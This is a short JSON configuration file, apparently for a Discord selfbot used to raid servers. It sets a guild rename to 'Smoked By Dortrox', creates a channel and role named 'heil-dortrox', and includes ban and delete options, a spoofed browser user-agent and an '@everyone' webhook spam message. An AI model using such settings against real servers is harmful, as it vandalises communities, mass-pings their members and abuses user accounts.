{
    "Activity_name": "Serving DORTROX",
    "delete": 10,
    "guild": {
        "ban": "False",
        "channel_json": {
            "name": "heil-dortrox",
            "type": 0
        },
        "guildName": "Smoked By Dortrox",
        "role_json": {
            "name": "heil-dortrox"
        }
    },
    "prefix": "$",
    "token": "",
    "uagent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",
    "webhook": "True",
    "webhook_content": "@everyone A selfbot created by dortrox",
    "webhook_name": "Dortrox"
}